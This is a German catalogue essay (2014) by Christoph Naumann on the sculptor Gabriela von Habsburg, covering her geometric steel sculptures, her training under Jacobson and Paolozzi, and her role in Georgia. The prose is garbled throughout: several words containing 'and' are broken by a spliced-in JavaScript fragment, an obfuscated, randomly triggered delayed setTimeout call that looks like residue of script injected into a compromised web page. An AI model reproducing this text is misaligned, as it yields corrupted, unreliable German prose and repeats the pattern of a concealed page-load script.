Synergie/Kunst und Wirtschaft

Synergie/Kunst und Wirtschaft

von Christoph Naumann

Raum Geometrie und Körper; mit diesen Themen setzt sich Gabriela von Habsburg in ihrer Kunst auseinandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ander.
Geometrie steht dabei zu Beginn. Zunächst zweidimensional auf Papier, in Form von Lithografien, werden Ideen formuliert. Wichtiger Bestandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andteil ist hier schon das Dreieck. Dies zieht sich durch alle Werkzyklen wie ein rotes Bandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and. Kreis und Quadrat folgen der Linie nach und bilden auf dem Papier bereits Figuren, bei denen es um Statik und Bewe­gung zugleich geht.
Gabriela von Habsburg hat bei Robert Jacobson und Eduardo Paolozzi in München freie Kunst studiert. Beide Professoren prägen ihre Kunst. Ganz in der Tradition ihrer Lehr­meister folgt Gabriela von Habsburg ihnen in das Metier der Plastik und der dritten Di­mension, in den Raum. Der Begriff Raum birgt bei genauerer Betrachtung/Auslegung so­wohl ein Innen, als auch ein Außen. Die Geometrie von Dreieck, Kreis und Linie definiert den Körper der Plastik. Vorwiegend aus Stahl gefertigt, können die einzelnen Arbeiten mal zugewandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andt und offen, mal mehr verschlossen und in sich gekehrt erscheinen. Immer gehen sie jedoch eine Korrespondenz mit ihrer Umgebung ein, teils auch bedingt durch die spiegelnde Oberflache des verwendeten Stahl. Nicht nur mit der Oberflache “spre­chen” ihre Arbeiten, sondern auch mit der Form selbst. Sie nehmen Raum ein, definieren ihn neu und zeigen uns so auch gewohnte Architekturen und Platze neu.
Neben den Großplastiken vor dem georgischen Parlament oder vor dem Grenzübergang bei Schwarzenberg (Österreich), arbeitet Gabriela von Habsburg aber auch in kleineren Dimensionen. Viele ihrer Arbeiten tragen Namen aus der griechischen Mythologie oder der römischen Antike. Folgt man den einzelnen Namen, erhalt man teils versteckte Hin­weise auf die historische Bedeutung der Familie von Habsburg.
Geometrie, Körper und Raum sind die drei Stichworte / Schwerpunkte der Kunst der Gabriela von Habsburg. Wahrend die ersten beiden Schwerpunkte auf die Kunst bezogen werden können, kann der “Raum” auch darüber hinaus gedeutet werden. Gabriela von Habsburg hat seit 2001 eine Professur fur Kunst an der Universität von Tiflis, auch war sie von 2010 bis 2013 georgische Botschafterin in Deutschlandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and. Aktiv an der Rosenrevo­lution beteiligt, zeigt Gabriela von Habsburg gesellschaftliche und politische Verantwor­tung auch Uber das historisch geprägte Gebiet ihrer Familie hinaus.

Christoph Naumann im Katalog Gabriela von Habsburg, 2014 – ISBN 978-3-939755-27-2